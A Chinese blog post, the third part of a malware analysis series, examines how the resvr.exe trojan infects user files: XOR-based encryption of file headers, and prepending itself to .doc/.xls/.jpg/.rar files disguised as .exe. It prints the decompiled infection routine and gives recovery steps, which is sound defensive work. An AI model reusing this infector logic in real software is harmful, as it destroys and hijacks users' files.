一个感染性木马病毒分析(三)--文件的修复

最新推荐文章于 2023-07-18 11:33:15 发布
最新推荐文章于 2023-07-18 11:33:15 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 网络编程

一、 序言


前面的分析一个感染型木马病毒分析(二)中,已经将该感染性木马病毒resvr.exe木马性的一面分析了一下,下面就将该感染性木马病毒resvr.exe感染性的一面分析一下。

 


二、文件感染方式的分析


之前感染性木马病毒的分析中,已经提到了病毒对于用户文件的感染方式有2种,分别是加密文件感染文件传播病毒,至于文件感染的时候采取哪种感染方式,病毒母体文件和病毒母体衍生病毒文件中都有相关的标志位。

 

1种感染文件的方式


前面分析的感染性木马病毒的木马性一面的过程中有下面一组远程控制命令RevCmdBuffer(如图)设置病毒进程感染文件的感染方式的标记0xAABBCCDD




在后面病毒进程感染用户文件的时候,有对感染文件方式的判断,具体的判断依据是感染标记0xAABBCCDD(如图)。当地址0x402120处的感染标记为0xAABBCCDD时,采用第一种感染文件的方式感染(加密文件的方式)。







第1种感染文件的方式的具体方法是 不对用户系统磁盘里的文件的格式进行筛选,只要是用户系统磁盘里的文件就进行加密处理。打开用户文件,创建内存映射,以先异或后加4的方式对用户文件的0x400个字节的数据进行加密处理。




第2种感染文件的方式


当地址0x402120没有感染标记0xAABBCCDD时,采用第2种感染文件的方式(感染文件传播病毒)。这种感染文件的方式 会对用户系统磁盘里的文件进行筛选,仅仅对用户系统磁盘里的.doc.xls.jpg.rar格式的文件进行感染处理。




病毒母体文件resvr.exe感染.doc.xls.jpg.rar格式的用户文件的具体过程如下面的代码。


[cpp]  view plain  copy
  1. int __stdcall InfectedFileOfHide_4035BD(LPCSTR lpUserFilePath, int lpUserFileEx, int nNumber)  
  2. {  
  3.     int _hUserFile; // eax@1  
  4.     signed int nUserFileSize; // eax@2  
  5.     HANDLE hModuleVirusesFile; // eax@5  
  6.     DWORD nVirusesModulesize; // eax@5  
  7.     HGLOBAL lpMemoryAlloc; // eax@5  
  8.     HGLOBAL __lpMemoryAlloc; // esi@7  
  9.     __int64 nFileExFilexOffset; // rax@7  
  10.     CHAR *lpUserFilePathBuffer; // edi@7  
  11.     int lpUserFilePathPtr; // edi@9  
  12.     DWORD NumberOfBytesWritten; // [sp+0h] [bp-228h]@7  
  13.     DWORD NumberOfBytesRead; // [sp+4h] [bp-224h]@7  
  14.     LPCVOID _lpMemoryAlloc; // [sp+8h] [bp-220h]@7  
  15.     DWORD nVirusesAndUserFileSize; // [sp+Ch] [bp-21Ch]@5  
  16.     DWORD _nUserFileSize; // [sp+10h] [bp-218h]@2  
  17.     DWORD nNumberOfBytesVirusesFileToRead; // [sp+14h] [bp-214h]@5  
  18.     HANDLE hUserFile; // [sp+18h] [bp-210h]@2  
  19.     HANDLE hVirusesHandle; // [sp+1Ch] [bp-20Ch]@5  
  20.     CHAR szUserFilePathBuffer; // [sp+20h] [bp-208h]@7  
  21.     CHAR FileVirusesName; // [sp+124h] [bp-104h]@5  
  22.   
  23.     // 打开需要感染处理的用户文件  
  24.     _hUserFile = (int)CreateFileA(lpUserFilePath, 0xC0000000, 0, 0, 3u, 0x80u, 0);  
  25.     if (_hUserFile != -1)  
  26.     {  
  27.         hUserFile = (HANDLE)_hUserFile;        
  28.           
  29.         // 获取需感染用户文件的大小  
  30.         nUserFileSize = GetFileSize((HANDLE)_hUserFile, &_nUserFileSize);  
  31.   
  32.         // 当用户文件大小大于0x8000000或者大于4G时,不感染用户文件  
  33.         if (nUserFileSize > 0x8000000 || _nUserFileSize)  
  34.         {  
  35.             _hUserFile = CloseHandle(hUserFile);  
  36.         }  
  37.         else  
  38.         {  
  39.             _nUserFileSize = nUserFileSize;           
  40.   
  41.             // 获取当前病毒进程模块的名称  
  42.             GetModuleFileNameA(0, &FileVirusesName, 0x104u);  
  43.               
  44.             // 打开当前病毒进程的文件  
  45.             hModuleVirusesFile = CreateFileA(&FileVirusesName, 0x80000000, 3u, 0, 3u, 0x80u, 0);  
  46.             hVirusesHandle = hModuleVirusesFile;        
  47.   
  48.             // 获取当前病毒进程文件的大小  
  49.             nVirusesModulesize = GetFileSize(hModuleVirusesFile, &nNumberOfBytesVirusesFileToRead);  
  50.             nNumberOfBytesVirusesFileToRead = nVirusesModulesize;  
  51.               
  52.             // 病毒进程感染用户文件之后,感染文件的总文件大小。  
  53.             nVirusesAndUserFileSize = _nUserFileSize + nVirusesModulesize;  
  54.   
  55.             // 根据感染后文件的大小,申请内存空间  
  56.             lpMemoryAlloc = GlobalAlloc(0x40u, _nUserFileSize + nVirusesModulesize);  
  57.             if (lpMemoryAlloc)  
  58.             {  
  59.                 _lpMemoryAlloc = lpMemoryAlloc;  
  60.                 __lpMemoryAlloc = lpMemoryAlloc;          
  61.   
  62.                 // 读取当前病毒进程的全部的PE文件数据到刚申请的内存中  
  63.                 ReadFile(hVirusesHandle, lpMemoryAlloc, nNumberOfBytesVirusesFileToRead, &NumberOfBytesRead, 0);  
  64.                   
  65.                 // 读取需要被感染用户文件的全部数据追加到内存的后面即紧接着在内存缓冲区后面存放原用户文件的数据  
  66.                 ReadFile(hUserFile, (char *)__lpMemoryAlloc + nNumberOfBytesVirusesFileToRead,_nUserFileSize, &NumberOfBytesRead,  
  67.                 0);                                     
  68.                   
  69.                 // 在标志[00402000]=11 11 11 11处即申请内存中,保存被感染用户文件的大小。  
  70.                 setFileInfor_403B61((int)&_nUserFileSize, (int)_lpMemoryAlloc, dword_402000, (int)&_nUserFileSize, 4);  
  71.   
  72.                 // // 在标志[00402008]=22 22 22 22处即申请内存中,保存被感染用户文件的原后缀名。  
  73.                 LODWORD(nFileExFilexOffset) = setFileInfor_403B61(  
  74.                     (int)&lpUserFileEx,  
  75.                     (int)_lpMemoryAlloc,  
  76.                     dword_402008,  
  77.                     (int)&lpUserFileEx,  
  78.                     4);       
  79.                   
  80.                 // 提取被感染用户.doc、.xls、.jpg、.rar格式文件的图标资源,  
  81.                 // 然后将感染后用户文件的资源图标修改为提取到被感染用户.doc、.xls、.jpg、.rar格式文件的图标。  
  82.                 SetUserFileIcon_403573(nFileExFilexOffset, (int)_lpMemoryAlloc, nNumber);  
  83.                   
  84.                 // 设置被感染用户文件的文件指针在文件头。  
  85.                 SetFilePointer(hUserFile, 0, 0, 0);       
  86.                   
  87.                 // 将申请的内存中的(病毒母体文件的数据+被感染用户文件的数据)重新写回到被感染用户文件中  
  88.                 // 此时感染后的用户文件变成了病毒母体衍生病毒文件  
  89.                 WriteFile(hUserFile, _lpMemoryAlloc, nVirusesAndUserFileSize, &NumberOfBytesWritten, 0);  
  90.                   
  91.                 // 释放申请的内存空间  
  92.                 GlobalFree((HGLOBAL)_lpMemoryAlloc);    
  93.   
  94.                 // 关闭文件句柄   
  95.                 CloseHandle(hVirusesHandle);              
  96.                 CloseHandle(hUserFile);                   
  97.                   
  98.                 // 保存被感染用户文件的路径字符串到szUserFilePathBuffer中。  
  99.                 RtlMoveMemory(&szUserFilePathBuffer, lpUserFilePath, 0x104);  
  100.                 lpUserFilePathBuffer = &szUserFilePathBuffer;//   
  101.                   
  102.                 // 设置被感染用户文件路径字符串的指针到末尾。  
  103.                 while (*lpUserFilePathBuffer++ != 0)  
  104.                     ;  
  105.                 *lpUserFilePathBuffer = 0;               
  106.                   
  107.                 // 将被感染用户文件路径字符串指针指向文件后缀名字符的位置如".xls"的首地址处  
  108.                 lpUserFilePathPtr = (int)(lpUserFilePathBuffer - 5);  
  109.                   
  110.                 // 将感染后的用户文件的文件后缀名改为"被感染用户文件的原文件名.exe"  
  111.                 *(_DWORD *)lpUserFilePathPtr = 'exe.';    
  112.                   
  113.                 // 修改被感染用户文件的文件名称为"被感染用户文件的原文件名.exe"并将感染后的衍生病毒文件释放到被感染用户原文件路径下。  
  114.                 _hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer);  
  115.                    
  116.                   
  117.                 if (!_hUserFile)  
  118.                 {  
  119.                     _hUserFile = GetLastError();  
  120.                     // 如果被感染用户原文件路径下,已经存在"被感染用户文件的原文件名.exe"文件。  
  121.                     if (_hUserFile == 0xB7)               
  122.                     {  
  123.                         // 恢复被感染用户文件的路径为原路径字符串即 "被感染用户文件原文件名.被感染用户文件原后缀名"  
  124.                         *(_DWORD *)lpUserFilePathPtr = lpUserFileEx;  
  125.                           
  126.                         // 修改被感染用户文件的路径字符串为"被感染用户文件原文件名.被感染用户文件原后缀名.exe"  
  127.                         *(_DWORD *)(lpUserFilePathPtr + 4) = 'exe.';  
  128.                         *(_DWORD *)(lpUserFilePathPtr + 8) = 0;  
  129.                           
  130.                         // 在被感染用户原文件的路径下,创建"被感染用户文件原文件名.被感染用户文件原后缀名.exe"的衍生病毒文件。  
  131.                         _hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer);  
  132.                     }  
  133.                 }  
  134.             }  
  135.             else  
  136.             {  
  137.                 //关闭文件句柄  
  138.                 CloseHandle(hVirusesHandle);  
  139.                 _hUserFile = CloseHandle(hUserFile);  
  140.             }  
  141.         }  
  142.     }  
  143.     return _hUserFile;  
  144. }  



病毒母体文件resvr.exe感染.doc.xls.jpg.rar格式的用户文件的具体流程如下。



三、被感染文件的修复


第1种感染方式文件的修复


对于被第1种感染方式处理的用户文件的修复比较简单,只需遍历被加密的用户文件,以内存映射的方式打开文件,对打开文件的头0x400个字节的数据的进行先减4(字节类型)后异或0x5FF80F64DWORD型)的处理即可修复被感染加密处理的用户文件。修复被感染文件的难点是如何判断用户的文件是被这种感染方式处理的

 

 

第2种感染方式文件的修复


这个感染方式对用户.doc.xls.jpg.rar格式的文件的感染,其实就是病毒母体resvr.exe产生衍生病毒即产生病毒载体的过程。只要将上面提到的病毒感染用户文件的过程理解清楚了,恢复文件也不能。

 

病毒母体文件resvr.exe与衍生病毒载体的文件对比。

 

将病毒母体文件“resvr.exe”与衍生病毒文件“石林.xls.exe”进行16进制的对比,发现两处不同。






文件对比结果的第1处不同是恢复感染用户文件的关键,具体的说明如图。

 

当为病毒母体文件resvr.exe时,标记 1--0x11111111后面的值是0xFFFFFFFF,标记 2--0x22222222后面保存的默认文件后缀名为.xls




当为衍生病毒文件时,标记 1--0x11111111后面的值是被感染用户文件原文件的大小,标记 2--0x22222222后面保存的被感染用户文件原文件的后缀名




文件对比结果的2不同,对于恢复被感染的用户文件也是有帮助的。

 

病毒母体文件resvr.exe的大小为0x11200,在衍生病毒文件中从文件偏移FileOffset=0x11200到文件结尾的数据就是被用户感染.doc.xls.jpg.rar格式的文件原文件的数据

 




恢复方法总结


一、.获取被感染用户文件的原文件的大小


方法1、通过在衍生病毒文件中搜索0x11111111的位置即可获取原文件的大小,因为被感染用户文件原文件的字节大小信息保存在该位置+4的地方;


方法2、直接定位衍生病毒文件的偏移0x400的位置找到0x1111111,该位置+4的地方就是被感染用户文件原文件的字节大小的信息。


二、获取被感染用户文件的原文件的文件类型


方法1、通过在衍生病毒文件中搜索0x22222222的位置即可获取被感染用户文件原文件类型字符串,因为被感染用户文件原文件类型字符串信息保存在该位置+4的地方;


方法2、直接定位衍生病毒文件的偏移0x408的位置找到0x22222222,该位置+4的地方就是被感染用户文件原文件类型字符串信息。


三、获取被隐藏的原文件的文件的数据


由于衍生病毒隐藏用户文件的方式很简单,直接将用户文件(要被感染的用户文件原文件)紧接着放在病毒母体文件数据的后面,并将用户文件(要被感染的用户文件原文件)信息保存在病毒母体的文件数据中,并且病毒母体文件的大小为0x11200


病毒母体文件数据(保存了被感染用户文件的信息)0x11200

感染用户文件文件数据

 

因此,只要读取衍生病毒文件中病毒母体文件数据后面即文件偏移0x11200以后至文件末尾的数据,再重新创建一个文件被感染用户文件的原文件就可恢复了。




感染性木马病毒详细的分析完了,笔记也完成了,过程还是快乐的,加油!

H-KING
关注
专栏目录
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8649
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
修复被vbs病毒感染的html文件小工具(最新版)
11-16
支持多线程,支持指定修复,保留正常html,修复被vbs病毒感染的html文件,保留正常代码,删除例如"[removed]<!-- DropFileName = "svchost.exe""这样的病毒代码
使用CMD修复和恢复病毒感染文件
陨星落云的博客
06-29 778
使用CMD修复和恢复病毒感染文件
文件被病毒感染了,全部变成隐藏文件恢复过程
不会处理故障的运维不是好程序员,WX:li669216072 只帮忙协助博客所遇到的类似问题
10-31 7400
故障说明:由于用户中了病毒,导致文件服务器的共享被病毒感染,全部变为隐藏文件夹,然后生成伪装的exe应用,名字就是文件夹的名称,如果点击了就会继续感染,同时还会生成scr后缀名的文件。 由于公司并没有进行集中管控防毒中心,所以一时半会并不知道哪台电脑感染的,于是先缩小范围定位。 先确定该文件夹有读写权限的用户,发现只有一个用户符合条件,管理员用户忽略。 该用户是生产测试车间的公用账号...
文件感染
weixin_30549657的博客
01-29 113
#include<stdlib.h>#include<stdio.h>typedef struct node{ int id; int fileSize; int origSize; int isFolder; struct node *parent; struct node *child; struct node *next; struct node *brother;}...
个人计算机防木马防病毒设置攻略--安全
03-24
木马和病毒是威胁计算机安全的主要因素,它们可以窃取个人信息,破坏系统稳定性,甚至控制用户的设备。本文将深入探讨如何有效地设置个人计算机,以防止木马和病毒的侵袭。 首先,我们要理解木马和病毒的区别。木马...
C++木马病毒的查杀设计与实现(含源码)
12-04
本话题主要探讨的是如何利用C++技术设计和实现一个木马病毒的查杀工具,这涉及到多个重要的知识点。 1. **恶意代码分析**:查杀木马病毒的第一步是对恶意代码进行分析。这通常包括静态分析(不执行代码,仅通过反...
恶性木马专杀工具解决顽固病毒木马浏览器首页劫持问题
04-07
在IT领域,安全是至关重要的一个环节,尤其是对于个人用户来说,电脑被恶意软件或木马病毒感染往往会导致诸多问题。本文将围绕标题“恶性木马专杀工具解决顽固病毒木马浏览器首页劫持问题”及相关的描述进行深入探讨...
木马与病毒
03-26
今时今日,一直都有不少的人以为木马和病毒没什么区别,只要安装了杀毒软件,那么就万事无忧了。其实,木马并不等同于病毒,杀毒软件未必就能将隐藏的木马抓出来。下面,我们先来了解下木马与病毒的定义。
Malware:No Escape
08-08
恶意软件No Escape,源自gtb搬运,仅支持Windows Nt10平台运行,因执行时会删除当前用户桌面所有文件,请勿手残在实体机上运行!
virut感染文件恢复算法
你连心爱的女人的大便都不敢吃, 还敢说爱她
01-01 1324
接上一篇:virut文件感染算法 上一篇是在我阅读完virut感染代码后立刻写的, 然后这几天我在写恢复算法, 今天差不多完成了, 写的同时, 发现有的地方我理解地不准确. 例如, 当直接修改oep而不通过hook点1来跳转到病毒代码时, 是没有那两句c6 05/ c7 05的, 此时就通过计算来得到oep值, 也就是我源代码中的backvalue1和backvalue2. 源代码VS2017解...
又见感染驱动文件和驱动文件感染新思路
03-21 885
看样子这玩意又出来了~不过没有ida分析过~只是想说点我的C代码的感染驱动时的一点点小技巧,我们知道驱动可以包含资源这部分资源又可以释放到内存或者怎么怎么的搞成一个executive image mapping,然后xxx.再zzz就可以执行资源,甚至里面还可以有些猥琐的各种加密之类的玩意——没错,我说的就是资源打包方式的感染,这玩意不陌生,至少二十一世纪初期这是个流行的感染方法,只要手工写一个
virut文件感染算法
你连心爱的女人的大便都不敢吃, 还敢说爱她
01-01 983
文章目录随便词汇大流程感染过程大流程按照流程顺序---几个重要的点附录is_junk标志方式病毒块1分块指令块变形复制结构其他零碎函数声明rand_mul的返回值为rax突然增加一个变量,而且从来没有赋值? 随便 该变种+0x20处的值为0x2b845b00 根据IDA F5代码的反人类程度, 可以确定virut肯定是作者用汇编写的. 然后IDA F5先转成IL, 简化后生成C代码, 只有这样生成...
高级语言实现文件感染的方法
05-16 1355
序用高级语言感染文件是快速编写功能强大的病毒或者蠕虫的一条途径,本文将讲述近年来出现的一系列高级语言实现的文件感染方法。这里不提任何使用汇编代码和pe文件插入的技术。一.文件伴侣所谓文件伴侣病毒,在Windows时代也有一些不同的定义,所谓伴侣就是改名原文件,然后把自己Copy过去覆盖原文件,运行时创建伴侣进程。原理性代码:Copy codevoid FrInfect(char *sour
攻击载荷、木马、蠕虫、感染型病毒,你了解多少?
最新发布
qq_32044265的博客
07-18 1312
恶意程序是指数字世界中带有攻击意图的程序实体,通常可以分为攻击载荷、木马、蠕虫、感染型病毒。除此之外,还有一类最难清除的病毒,业内通常命名为Rootkit、Bootkit。
一个感染型木马病毒分析(一)
Fly20141201. 的专栏
08-04 6722
一、 样本信息 样本名称:resvr.exe(病毒母体) 样本大小:70144 字节 病毒名称:Trojan.Win32.Crypmodadv.a 样本MD5:5E63F3294520B7C07EB4DA38A2BEA301 样本SHA1: B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895 电脑中了该病毒的典型的特
resvr.exe 电脑病毒清理
tnb_ml的博客
08-31 664
1、拷贝病毒母体文件resvr.exe自身到C:\Program Files\Common Files\Microsoft Shared目录下设置其属性为系统属性隐藏并运行创建C:\Program Files\Common Files\Microsoft Shared\resvr.exe进程。电脑感染了此病毒的典型的特征是系统逻辑盘里的.doc、.xls、.jpg、.rar格式的文件会被隐藏起来变成.exe格式的病毒文件。,如果一台干净的系统,只要运行一次感染病毒的文件,你的电脑里的其它文件就将被感染。..
理解恶意软件:病毒、木马、蠕虫与间谍软件的区别
一个受感染的文件被执行时,病毒会将自己的代码插入到其他文件中,从而扩散。它们可能破坏系统、删除数据或使计算机无法正常工作。 2. **木马**:木马(Trojan)的名字来源于希腊神话中的特洛伊木马,它隐藏在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值